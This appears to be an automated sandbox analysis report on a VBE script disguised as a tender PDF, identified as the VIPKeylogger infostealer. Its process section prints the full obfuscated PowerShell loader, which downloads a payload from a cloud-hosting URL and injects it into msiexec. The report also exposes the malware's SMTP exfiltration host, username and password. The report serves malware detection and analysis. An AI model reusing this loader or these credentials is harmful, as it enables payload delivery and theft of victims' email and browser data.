Analysis

  • max time kernel
    297s
  • max time network
    204s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06/11/2024, 01:58

General

  • Target

    tender No. SHG-00080 - EPC2 -PDF.vbe

  • Size

    26KB

  • MD5

    5c41205813f5cb6111f7f54c55d79401

  • SHA1

    aded64d5b2fbd084ac1d9bf2916cc30668233636

  • SHA256

    37479a80364231d642aae1e5e2acbd5bd5ed93dce441890200f71f8063420a66

  • SHA512

    fac62621bd79c5befc2fc3c91a25ab185bb7958e3ccd2cf6eae2e736977cd3a4106b3ee38aa56e900b1e62c3f36a8f7dd69b5eff2d3e5a35c75ac1c12fd3aadd

  • SSDEEP

    768:OaRvluL79XDn/C+iV89wKpejmO1d527vkmQs90QtVFyMETjs365KbCXmosBOJ3oJ:V7J+Q0AMLzVZ1

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.pentaprima-adv.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    penta111!

Extracted

Family

vipkeylogger

Credentials

Signatures

  • VIPKeylogger

    VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.

  • Vipkeylogger family
  • Blocklisted process makes network request 12 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\tender No. SHG-00080 - EPC2 -PDF.vbe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3108
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Overdevoutness Imitations Stakaternes #>;$Penduline='Chartreuses';<#Phylloptosis surgeoness Hungaric #>; function Baandvvens($Lejesvenden170){If ($host.DebuggerEnabled) {$Gregs++;}$Endosomes=$Fortudede+$Lejesvenden170.'Length' - $Gregs; for ( $Bernini=5;$Bernini -lt $Endosomes;$Bernini+=6){$Berninindspillede=$Bernini;$Childbearing+=$Lejesvenden170[$Bernini];}$Childbearing;}function Grampa($Chalcanthite){ . ($Betonstykker) ($Chalcanthite);}$Klunsers=Baandvvens 'WhitlMBytteo To ezFalsiiEternlG,spel Drv a Haan/F nan ';$Skematiskes=Baandvvens ' yttiTTabull ChicsRa ha1 Bart2 Blan ';$dingeys='Ionsc[Mahm nWhaleE Jungt umle. EnebSEarthEW motr romVHovedIApikoc DvrgEFhaarpSal eoLvindiOpmaanElendtKasseMBraviaarbejNra dsaJackagSkygge PrikRHolog]Najad:Litte:Po lusShit eParisCCrossuBu ferStyrkiFej hTFor,kyKalkmPNonliRPle.ro onbot H.esO,esilCMa.geoSkadeLMave =Stere$UndersBeflikTvtniELledemF neraNystrT,eappIoverbsS.ummkfldnieNo exsHypot ';$Klunsers+=Baandvvens 'E tim5Ild j.Lo,en0Echev Anmas(,ndilW iwifitholen PrisdDumpeoMat,lwT,icosParit Pill.NShoa,T hoae Trsta1Berki0 Out,.Golds0Putr.;Ekspe SustWAnkeri Forbn tulu6Overh4 verl;forty FircixSubre6Eudai4Grati;Kamgr Se.irG indvF.yre:Abste1Listi3kurik1 chry.Arbej0Lok,l) asha BranGscandeUnoffcAllonktold oCorra/Akkad2Farso0Speci1,mper0 Thyr0Sl,gt1Udfr 0Quina1Orna PyrrhFNanetiRaamlrMar eeevasifYdmygoRes oxInter/Cykel1Racia3mi.kw1Antih. Man 0 R nd ';$Kunstlede245=Baandvvens 'Paralu capesInflaeDelegrDyste-Udg faved nG llebeFle fN SpoiTce lu ';$Edderkoppebenene=Baandvvens 'Obj khsetzbtAngritHelbrp Pr,psNomen:Horol/An lo/SplitdDe,anrNom,diRabatv SnvleTa re. Pr mg MiseoHygenoHen.egPicr.lForske Over.BltcicWormcoInkormS,lve/LomaguCarexcMagth? TongeForurx Brugp Sca oExtrarBu kit olet=CertidUnapto FlitwAllonn Hinkl RelaoScal,aUnderdSprid& TaariSyn rdFi al=invad1sign 3Bodel4 ErklU BagnaWilto5U.kobgAntikAPurpl9Kir,en ulesRegerOUafhaS FemvY A,iexV nocNMultimKnstcp ExamVFilolUSporuAKvgeun TingSplur.Ftrium4G ydeSForstFHelflKL endVStjmarS rabzScottIYnk,nsTa ar ';$Tidsprioritets=Baandvvens 'Eghj.>Video ';$Betonstykker=Baandvvens 'DyspniiagttEvrnepxTole ';$Hjertestops='Forbryderspires';$Tilegnet='\Viperous.Sta';Grampa (Baandvvens 'Redem$Opeidgmanifl papeoRatioB nteAScotolngles:HematTLinseoBlaffU ingerStudiN ProjeMilieDVaereOExcepsScr tE Sandn Bjer= Betn$BestiE ubicn Me kvConve:SymmeAA dirp VivepMiddeDShittAbunk.T TilsA cos +Kilde$ BrugtKloriiNon,fL ntaELamelg Ov,rnVeksee horeTMango ');Grampa (Baandvvens 'Natur$ WallgUrethl ilejoNydelb olkhASyda LPur y:OverdUPurpon a.tic FremaUnf.rnAffotcTvange rigeLHaandaSooniBLuftfLKonsoEUnth =Ethox$UdfriE,oodcDprimedMasche BibarN plek copOFormaPR sklPTjetaEGen,aB Gro eParcenFullwEjivesnbystrESvire.FortyS Dk.epS.amaL Vaa iMa veT Morm(Franc$Pne mtStemmIChlorDRedekSPupp.PGalopRUnresI ParaoSiderRRela i altrTA freEHerretMpb as Gi e)Frisk ');Grampa (Baandvvens $dingeys);$Edderkoppebenene=$Uncancelable[0];$Weco=(Baandvvens 'T mpo$ NonegMoss,lSouchoGr.naB SulpaUn atL Nond:partiUScoviDOrangMPra,sUIndsaNUltraD JaciEFulleDSpraiE Pie.S Cim,=Kid,en NecreOrd.nW Pros- IlluOAmblybPremijFirsie Fav.COriantPr,bo IndtasSlummySympoSLa,iltsavble I stmCompl.GavebnJarleE FavoTignot. P,trWHus aEAfterbHusf.CVentrL Que,inoncoeArrivnVolutTDikin ');Grampa ($Weco);Grampa (Baandvvens 'Hypoc$snowfUgeni dKvadrmSamh.u Una nSpunsd Genee AfsadFariseR,diosBeg d.au ocHkontreMyselaTennedSupereFalhor ithrsHjem.[Frib $FurzeKBap iu,radonSteensTr cht Bequl RenteSlipndBrn teL kal2Kolle4Flock5 onve] Da r= samm$Do baKunclal Indtu chrnDynass.omfreUnderrBackssAfstu ');$Monsuns=Baandvvens 'Plati$UnfomUKunmidScowlmIncreuPa.glnRedhodTennieLambddDrmmeeDe tasStila.UvanuDcocciocheviwKalknn orsilErst oPremea Idead SaarFCrowbiIndeklSe vaeTofag(T.ack$NonreE ovred sterdBilleeSt etrS btoksergeoAudiopGar ep BraneUnme bCoideelactinOplyseVrkstnDybvaeLnned,Iml d$ZymosRSlgt,iPolitcDiacotpa,seaNrtfolunfam)Sysse ';$Rictal=$Tournedosen;Grampa (Baandvvens 'Hakni$Fly eG.oninlrumruOHydrobPy,traRecraL Foru:SnohaU ScurDFjernbH snuaJernbSBailiU Ra.pnFordae TilsrMil niSteniNSvklignonpoEKirkeR Overn Syste,dnbesdomst= krif( CoprT ,udeeSkrams onrut Brai-Kongrp ispraSpidsTAm rthPreco Eu,io$UdtoeRDissei SociCTr loT Sam a OmeglLazul)D nin ');while (!$Udbasuneringernes) {Grampa (Baandvvens 'Ganga$IndhagDiskelDuplioFuglebSe,veaC,ayllBrush:OverpTStimueBlindaDatanr Top.eAlumirT gges Pers=Mosel$Chlort Sh vrBnhrouIntrae Arte ') ;Grampa $Monsuns;Grampa (Baandvvens 'Fo mss ortTUnbegaProgyrSla bTAnoca-S,owhS Skdel baaneMehelEOutcupBen e Coryd4Fan,a ');Grampa (Baandvvens ' Craf$P.agtgIns,iLtil aO ienbKrubuA MetaLFeebl: ljenUTrklddBonitb UncoAHoldasPokieUMourinDesa,EGluc RSweatiskat,n.ndbaGInsatEwif,krExtr NAldere ForksThall=Mason(PatoltfolkeEMaskeSItemiT lokk-Villep ftenaEquivTSarseHM sar Galle$SuppoR KummI ircucLavrstMid.oaG,nboL ndit)H,gma ') ;Grampa (Baandvvens 'Harpe$TransgUa.taLChromoK nstb ftrkAListeLFeli : HypePTepefHDishoE Men n tireyUnifoLGoniob LickULin,eTFrousATogglz KarooTraveNKni seCafun=Pukyu$Fr,gog oastLarcusOAfterBTalsmASourilKam k: TuricLogotOA ater inflTBruyeIp.adeCCac.gOEpileUSt,fhSTolle+ Ophr+ Auto%Nonin$pythauEpiten ,isvcAcce,aA vasNLesbiCSa gsELigetLFouteAVinceBUnramLT,leoETvrmi.Marmac ci.koNonisu FadlN kbntPu sb ') ;$Edderkoppebenene=$Uncancelable[$phenylbutazone];}$Fifish=278666;$Berninindkbschefer=30895;Grampa (Baandvvens 'yvere$OveraG DrivlRequioMikkeb SynkAOverfLMesot: ForgUBlodrRForsvaEufemnSuperO Indsgmis rR.abacaIrradpCin,mH DeklEfrygtrN nsi Eriks=Recog SkalagI,dkoE EtagtEphra- BundCb rgmoPrintNMartitU ariEInsupnD.nattWhe.l Overf$SmuttrFire i enigcTimepTDatabAVidnelWet e ');Grampa (Baandvvens ' Zani$A.gergEkseklFor io Tracbstraaa Altsl Godk:PrefeFHyperoSwaggrT,edisdis agNonpesJ.ksrpKompeeSnowbrvdd lsEb.geoTo dfnMi bieSatsbrSving Modta=Forbi Abst[ SubrSSapphyJi.bysVanm tM.lineDad em Arve. PlutCChes,oDoughn rimv FindeUoplyrBetalt rupp] Bill:Si ne:SnebrF Ca mrBnfaloDemokmDatalBDr.dgaCoronsUd,oveUdski6Dagn 4ModefSAffortBytterAdobeida cenUrt dgSuppe( esu$o,stcU Mesor DiscaBlokknO ermoDobb g e kyrNegroavicefpCo lehroo neMaur r kns) P nt ');Grampa (Baandvvens 'Tinpe$AntelgLazzalunmerOPlumbbFunilaOvertLUntit:O.trapVildtR laai Washnat isc.nsapIFeltnPFlygta mskoLCenteINiniat urntyComat Indkl=Udpre Granu[ProsesUncomYDamk,s ibret DerfeDowngm Und .SuperTFremaeHeroexBetnktP.ant.GhenteBodegnJenl.C Ecpho Lan d,rainiMou.tn R seG lang] P,ec:Kokke:DiffuaEj.rtsB,ntacStrygi.amaiiBogsi. omatGGaz teforfaTNa tesTr phTAdre.RCremeIve nun ilhg Smgt(Unini$Evel.f urdeOBourdR San,sCardigvovvoS edaapTrneneOplanrSuprasAlmagOMerkanFrigreIntenRPrin.) Itha ');Grampa (Baandvvens 's ree$ ycoG Cal LNetwioStrtabFrafraAfkoglLymph:ankomPInkasA UnawRSpydsTDypnii saricUtjhuUirritL lydeaOc,ahrF skeiUnhansUdlediGlosenangleGStry.=Hurta$ brupP Lif r GloaiSeddenvels.c fouriD,trspLousea enzaL lasI Seast.agonyMimd.. UnslSU joiU E haBPrim.sprev tGreesrA klei inanNVolitGUrkok(Herma$SysteFAntikISkaftfSellaIt,ions Aw ihChiro, Vene$Lag rBR goleEbon.rhellinPunchIcanasNStvriI B.fanNatskdO hthK ,ekuBPort,s PsitC Alt,hsavneENo,defK ippeTapetr roto)Clau ');Grampa $Particularising;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3956
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Overdevoutness Imitations Stakaternes #>;$Penduline='Chartreuses';<#Phylloptosis surgeoness Hungaric #>; function Baandvvens($Lejesvenden170){If ($host.DebuggerEnabled) {$Gregs++;}$Endosomes=$Fortudede+$Lejesvenden170.'Length' - $Gregs; for ( $Bernini=5;$Bernini -lt $Endosomes;$Bernini+=6){$Berninindspillede=$Bernini;$Childbearing+=$Lejesvenden170[$Bernini];}$Childbearing;}function Grampa($Chalcanthite){ . ($Betonstykker) ($Chalcanthite);}$Klunsers=Baandvvens 'WhitlMBytteo To ezFalsiiEternlG,spel Drv a Haan/F nan ';$Skematiskes=Baandvvens ' yttiTTabull ChicsRa ha1 Bart2 Blan ';$dingeys='Ionsc[Mahm nWhaleE Jungt umle. EnebSEarthEW motr romVHovedIApikoc DvrgEFhaarpSal eoLvindiOpmaanElendtKasseMBraviaarbejNra dsaJackagSkygge PrikRHolog]Najad:Litte:Po lusShit eParisCCrossuBu ferStyrkiFej hTFor,kyKalkmPNonliRPle.ro onbot H.esO,esilCMa.geoSkadeLMave =Stere$UndersBeflikTvtniELledemF neraNystrT,eappIoverbsS.ummkfldnieNo exsHypot ';$Klunsers+=Baandvvens 'E tim5Ild j.Lo,en0Echev Anmas(,ndilW iwifitholen PrisdDumpeoMat,lwT,icosParit Pill.NShoa,T hoae Trsta1Berki0 Out,.Golds0Putr.;Ekspe SustWAnkeri Forbn tulu6Overh4 verl;forty FircixSubre6Eudai4Grati;Kamgr Se.irG indvF.yre:Abste1Listi3kurik1 chry.Arbej0Lok,l) asha BranGscandeUnoffcAllonktold oCorra/Akkad2Farso0Speci1,mper0 Thyr0Sl,gt1Udfr 0Quina1Orna PyrrhFNanetiRaamlrMar eeevasifYdmygoRes oxInter/Cykel1Racia3mi.kw1Antih. Man 0 R nd ';$Kunstlede245=Baandvvens 'Paralu capesInflaeDelegrDyste-Udg faved nG llebeFle fN SpoiTce lu ';$Edderkoppebenene=Baandvvens 'Obj khsetzbtAngritHelbrp Pr,psNomen:Horol/An lo/SplitdDe,anrNom,diRabatv SnvleTa re. Pr mg MiseoHygenoHen.egPicr.lForske Over.BltcicWormcoInkormS,lve/LomaguCarexcMagth? TongeForurx Brugp Sca oExtrarBu kit olet=CertidUnapto FlitwAllonn Hinkl RelaoScal,aUnderdSprid& TaariSyn rdFi al=invad1sign 3Bodel4 ErklU BagnaWilto5U.kobgAntikAPurpl9Kir,en ulesRegerOUafhaS FemvY A,iexV nocNMultimKnstcp ExamVFilolUSporuAKvgeun TingSplur.Ftrium4G ydeSForstFHelflKL endVStjmarS rabzScottIYnk,nsTa ar ';$Tidsprioritets=Baandvvens 'Eghj.>Video ';$Betonstykker=Baandvvens 'DyspniiagttEvrnepxTole ';$Hjertestops='Forbryderspires';$Tilegnet='\Viperous.Sta';Grampa (Baandvvens 'Redem$Opeidgmanifl papeoRatioB nteAScotolngles:HematTLinseoBlaffU ingerStudiN ProjeMilieDVaereOExcepsScr tE Sandn Bjer= Betn$BestiE ubicn Me kvConve:SymmeAA dirp VivepMiddeDShittAbunk.T TilsA cos +Kilde$ BrugtKloriiNon,fL ntaELamelg Ov,rnVeksee horeTMango ');Grampa (Baandvvens 'Natur$ WallgUrethl ilejoNydelb olkhASyda LPur y:OverdUPurpon a.tic FremaUnf.rnAffotcTvange rigeLHaandaSooniBLuftfLKonsoEUnth =Ethox$UdfriE,oodcDprimedMasche BibarN plek copOFormaPR sklPTjetaEGen,aB Gro eParcenFullwEjivesnbystrESvire.FortyS Dk.epS.amaL Vaa iMa veT Morm(Franc$Pne mtStemmIChlorDRedekSPupp.PGalopRUnresI ParaoSiderRRela i altrTA freEHerretMpb as Gi e)Frisk ');Grampa (Baandvvens $dingeys);$Edderkoppebenene=$Uncancelable[0];$Weco=(Baandvvens 'T mpo$ NonegMoss,lSouchoGr.naB SulpaUn atL Nond:partiUScoviDOrangMPra,sUIndsaNUltraD JaciEFulleDSpraiE Pie.S Cim,=Kid,en NecreOrd.nW Pros- IlluOAmblybPremijFirsie Fav.COriantPr,bo IndtasSlummySympoSLa,iltsavble I stmCompl.GavebnJarleE FavoTignot. P,trWHus aEAfterbHusf.CVentrL Que,inoncoeArrivnVolutTDikin ');Grampa ($Weco);Grampa (Baandvvens 'Hypoc$snowfUgeni dKvadrmSamh.u Una nSpunsd Genee AfsadFariseR,diosBeg d.au ocHkontreMyselaTennedSupereFalhor ithrsHjem.[Frib $FurzeKBap iu,radonSteensTr cht Bequl RenteSlipndBrn teL kal2Kolle4Flock5 onve] Da r= samm$Do baKunclal Indtu chrnDynass.omfreUnderrBackssAfstu ');$Monsuns=Baandvvens 'Plati$UnfomUKunmidScowlmIncreuPa.glnRedhodTennieLambddDrmmeeDe tasStila.UvanuDcocciocheviwKalknn orsilErst oPremea Idead SaarFCrowbiIndeklSe vaeTofag(T.ack$NonreE ovred sterdBilleeSt etrS btoksergeoAudiopGar ep BraneUnme bCoideelactinOplyseVrkstnDybvaeLnned,Iml d$ZymosRSlgt,iPolitcDiacotpa,seaNrtfolunfam)Sysse ';$Rictal=$Tournedosen;Grampa (Baandvvens 'Hakni$Fly eG.oninlrumruOHydrobPy,traRecraL Foru:SnohaU ScurDFjernbH snuaJernbSBailiU Ra.pnFordae TilsrMil niSteniNSvklignonpoEKirkeR Overn Syste,dnbesdomst= krif( CoprT ,udeeSkrams onrut Brai-Kongrp ispraSpidsTAm rthPreco Eu,io$UdtoeRDissei SociCTr loT Sam a OmeglLazul)D nin ');while (!$Udbasuneringernes) {Grampa (Baandvvens 'Ganga$IndhagDiskelDuplioFuglebSe,veaC,ayllBrush:OverpTStimueBlindaDatanr Top.eAlumirT gges Pers=Mosel$Chlort Sh vrBnhrouIntrae Arte ') ;Grampa $Monsuns;Grampa (Baandvvens 'Fo mss ortTUnbegaProgyrSla bTAnoca-S,owhS Skdel baaneMehelEOutcupBen e Coryd4Fan,a ');Grampa (Baandvvens ' Craf$P.agtgIns,iLtil aO ienbKrubuA MetaLFeebl: ljenUTrklddBonitb UncoAHoldasPokieUMourinDesa,EGluc RSweatiskat,n.ndbaGInsatEwif,krExtr NAldere ForksThall=Mason(PatoltfolkeEMaskeSItemiT lokk-Villep ftenaEquivTSarseHM sar Galle$SuppoR KummI ircucLavrstMid.oaG,nboL ndit)H,gma ') ;Grampa (Baandvvens 'Harpe$TransgUa.taLChromoK nstb ftrkAListeLFeli : HypePTepefHDishoE Men n tireyUnifoLGoniob LickULin,eTFrousATogglz KarooTraveNKni seCafun=Pukyu$Fr,gog oastLarcusOAfterBTalsmASourilKam k: TuricLogotOA ater inflTBruyeIp.adeCCac.gOEpileUSt,fhSTolle+ Ophr+ Auto%Nonin$pythauEpiten ,isvcAcce,aA vasNLesbiCSa gsELigetLFouteAVinceBUnramLT,leoETvrmi.Marmac ci.koNonisu FadlN kbntPu sb ') ;$Edderkoppebenene=$Uncancelable[$phenylbutazone];}$Fifish=278666;$Berninindkbschefer=30895;Grampa (Baandvvens 'yvere$OveraG DrivlRequioMikkeb SynkAOverfLMesot: ForgUBlodrRForsvaEufemnSuperO Indsgmis rR.abacaIrradpCin,mH DeklEfrygtrN nsi Eriks=Recog SkalagI,dkoE EtagtEphra- BundCb rgmoPrintNMartitU ariEInsupnD.nattWhe.l Overf$SmuttrFire i enigcTimepTDatabAVidnelWet e ');Grampa (Baandvvens ' Zani$A.gergEkseklFor io Tracbstraaa Altsl Godk:PrefeFHyperoSwaggrT,edisdis agNonpesJ.ksrpKompeeSnowbrvdd lsEb.geoTo dfnMi bieSatsbrSving Modta=Forbi Abst[ SubrSSapphyJi.bysVanm tM.lineDad em Arve. PlutCChes,oDoughn rimv FindeUoplyrBetalt rupp] Bill:Si ne:SnebrF Ca mrBnfaloDemokmDatalBDr.dgaCoronsUd,oveUdski6Dagn 4ModefSAffortBytterAdobeida cenUrt dgSuppe( esu$o,stcU Mesor DiscaBlokknO ermoDobb g e kyrNegroavicefpCo lehroo neMaur r kns) P nt ');Grampa (Baandvvens 'Tinpe$AntelgLazzalunmerOPlumbbFunilaOvertLUntit:O.trapVildtR laai Washnat isc.nsapIFeltnPFlygta mskoLCenteINiniat urntyComat Indkl=Udpre Granu[ProsesUncomYDamk,s ibret DerfeDowngm Und .SuperTFremaeHeroexBetnktP.ant.GhenteBodegnJenl.C Ecpho Lan d,rainiMou.tn R seG lang] P,ec:Kokke:DiffuaEj.rtsB,ntacStrygi.amaiiBogsi. omatGGaz teforfaTNa tesTr phTAdre.RCremeIve nun ilhg Smgt(Unini$Evel.f urdeOBourdR San,sCardigvovvoS edaapTrneneOplanrSuprasAlmagOMerkanFrigreIntenRPrin.) Itha ');Grampa (Baandvvens 's ree$ ycoG Cal LNetwioStrtabFrafraAfkoglLymph:ankomPInkasA UnawRSpydsTDypnii saricUtjhuUirritL lydeaOc,ahrF skeiUnhansUdlediGlosenangleGStry.=Hurta$ brupP Lif r GloaiSeddenvels.c fouriD,trspLousea enzaL lasI Seast.agonyMimd.. UnslSU joiU E haBPrim.sprev tGreesrA klei inanNVolitGUrkok(Herma$SysteFAntikISkaftfSellaIt,ions Aw ihChiro, Vene$Lag rBR goleEbon.rhellinPunchIcanasNStvriI B.fanNatskdO hthK ,ekuBPort,s PsitC Alt,hsavneENo,defK ippeTapetr roto)Clau ');Grampa $Particularising;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1612
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Accesses Microsoft Outlook profiles
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • outlook_office_path
      • outlook_win_path
      PID:888

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    0d53533b226ada04703fc90b556978a4

    SHA1

    4bf5e331fce099468eb2f4f34cbedf9411ddb8ae

    SHA256

    1589ebd677356cd2f45d1c79acfe8b8c2e03fa64931aff06e0fd9298cddd58e3

    SHA512

    1215eb84f69328a4bd085dddb4451d027d2569f4d7990b2e492682e17c5aa327015016a27cd384aa4968dfbaea731446b74b0562d73a41ce280e5caab32e3b55

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k2o35wef.oj3.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Viperous.Sta

    Filesize

    403KB

    MD5

    95e51168e6bb60c7098eecd438f59e14

    SHA1

    3bca0c8cdd1282e46d9976f8a14c0b8376a9413f

    SHA256

    86bca090b716304ec5c076b5fc9efffc0e8e5626e2585a96cf03b0b682962f22

    SHA512

    c2d2bf9047eeb1857f5b55b0d00dbb63cee6d6d95d52ccc081709794048bae95379855ca3ff6215ac89752ebd92a809f37255c58d58516bcacc4050bf0ca71f1

  • memory/888-68-0x0000000022CB0000-0x0000000022CBA000-memory.dmp

    Filesize

    40KB

  • memory/888-67-0x0000000025FF0000-0x0000000026082000-memory.dmp

    Filesize

    584KB

  • memory/888-64-0x0000000026480000-0x00000000269AC000-memory.dmp

    Filesize

    5.2MB

  • memory/888-63-0x0000000025670000-0x00000000256C0000-memory.dmp

    Filesize

    320KB

  • memory/888-62-0x0000000025D80000-0x0000000025F42000-memory.dmp

    Filesize

    1.8MB

  • memory/888-60-0x0000000025220000-0x00000000252BC000-memory.dmp

    Filesize

    624KB

  • memory/888-58-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

  • memory/888-59-0x0000000000A00000-0x0000000000A4A000-memory.dmp

    Filesize

    296KB

  • memory/888-57-0x0000000000A00000-0x0000000001C54000-memory.dmp

    Filesize

    18.3MB

  • memory/1612-20-0x0000000004DF0000-0x0000000004E26000-memory.dmp

    Filesize

    216KB

  • memory/1612-44-0x0000000008E00000-0x000000000E52B000-memory.dmp

    Filesize

    87.2MB

  • memory/1612-24-0x0000000005C80000-0x0000000005CE6000-memory.dmp

    Filesize

    408KB

  • memory/1612-36-0x00000000063D0000-0x00000000063EE000-memory.dmp

    Filesize

    120KB

  • memory/1612-37-0x0000000006400000-0x000000000644C000-memory.dmp

    Filesize

    304KB

  • memory/1612-38-0x0000000007C20000-0x000000000829A000-memory.dmp

    Filesize

    6.5MB

  • memory/1612-39-0x0000000006980000-0x000000000699A000-memory.dmp

    Filesize

    104KB

  • memory/1612-40-0x0000000007640000-0x00000000076D6000-memory.dmp

    Filesize

    600KB

  • memory/1612-41-0x00000000075D0000-0x00000000075F2000-memory.dmp

    Filesize

    136KB

  • memory/1612-42-0x0000000008850000-0x0000000008DF4000-memory.dmp

    Filesize

    5.6MB

  • memory/1612-23-0x0000000005C10000-0x0000000005C76000-memory.dmp

    Filesize

    408KB

  • memory/1612-34-0x0000000005D30000-0x0000000006084000-memory.dmp

    Filesize

    3.3MB

  • memory/1612-22-0x00000000054F0000-0x0000000005512000-memory.dmp

    Filesize

    136KB

  • memory/1612-21-0x00000000055E0000-0x0000000005C08000-memory.dmp

    Filesize

    6.2MB

  • memory/3956-0-0x00007FFCA4913000-0x00007FFCA4915000-memory.dmp

    Filesize

    8KB

  • memory/3956-19-0x00007FFCA4910000-0x00007FFCA53D1000-memory.dmp

    Filesize

    10.8MB

  • memory/3956-16-0x00007FFCA4910000-0x00007FFCA53D1000-memory.dmp

    Filesize

    10.8MB

  • memory/3956-15-0x00007FFCA4913000-0x00007FFCA4915000-memory.dmp

    Filesize

    8KB

  • memory/3956-11-0x00007FFCA4910000-0x00007FFCA53D1000-memory.dmp

    Filesize

    10.8MB

  • memory/3956-12-0x00007FFCA4910000-0x00007FFCA53D1000-memory.dmp

    Filesize

    10.8MB

  • memory/3956-10-0x0000022B69020000-0x0000022B69042000-memory.dmp

    Filesize

    136KB